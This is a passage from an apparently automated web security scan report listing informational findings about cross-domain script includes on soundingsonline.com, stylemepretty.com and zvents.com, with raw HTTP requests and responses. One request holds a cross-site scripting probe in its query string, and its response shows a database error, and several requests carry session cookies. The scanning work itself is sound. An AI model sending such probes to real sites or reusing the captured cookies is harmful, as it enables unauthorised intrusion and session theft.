Connection: close
Date: Fri, 28 Jan 2011 17:17:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.889. http://www.soundingsonline.com/news/dispatches

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/dispatches

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/dispatches HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.890. http://www.soundingsonline.com/news/home-waters

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/home-waters

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/home-waters HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.891. http://www.soundingsonline.com/news/mishaps-a-rescues

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/mishaps-a-rescues HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.892. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 15:00:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 15:00:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.893. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/mishaps-a-rescues/index.php HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.894. http://www.soundingsonline.com/news/sailing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/sailing

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/sailing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.895. http://www.soundingsonline.com/news/todays-top-stories

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/todays-top-stories

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/todays-top-stories HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.896. http://www.soundingsonline.com/resources

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /resources

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /resources HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.897. http://www.soundingsonline.com/site-map

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /site-map

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site-map HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.898. http://www.soundingsonline.com/subscription-services

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /subscription-services HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.899. http://www.soundingsonline.com/subscription-services/preview-current-issue

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/preview-current-issue

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /subscription-services/preview-current-issue HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.900. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/subscribe-to-e-newsletter

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /subscription-services/subscribe-to-e-newsletter HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.901. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stylemepretty.com
Path:   /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 15:06:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Sat, 28-Jan-2012 15:06:08 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 15:06:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39718


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 7]><![endif]-->
<!--[if lt IE 7]><![endif]-->
<html xmlns="http://
...[SNIP]...
<link rel="pingback" href="http://www.stylemepretty.com/xmlrpc.php" />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=1.4.2'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://static.ak.fbcdn.net/connect.php/js/FB.Share?ver=3.0.4'></script>
<!--stats_footer_test--><script src="http://stats.wordpress.com/e-201104.js" type="text/javascript"></script>
...[SNIP]...

18.902. http://www.zvents.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:47:10 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 35
ETag: "89f1d4056d24738faea924ba03321b72"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; path=/; expires=Fri, 29-Apr-2011 04:47:10 GMT; HttpOnly
Content-Length: 62540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<!--Leaderboard code -->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<!-- Test 1x1 Leaderboard code -->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<div class='ad_comp'><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.903. http://www.zvents.com/albany-ny/events

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /albany-ny/events

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:47:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 27
ETag: "5408503efaf6cdf5ddfcb960970a28ab"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uew4iCWNpdHkiC0FsYmFueSILcmFkaXVzaVAiDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmciD0FsYmFueSwgTlkiCnN0YXRlIgdOWQ%3D%3D--51f4096067c2ce5072e1ca3c5f593268f1df8d3d; path=/; expires=Fri, 29-Apr-2011 04:47:08 GMT; HttpOnly
Content-Length: 54135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<!--Leaderboard code -->
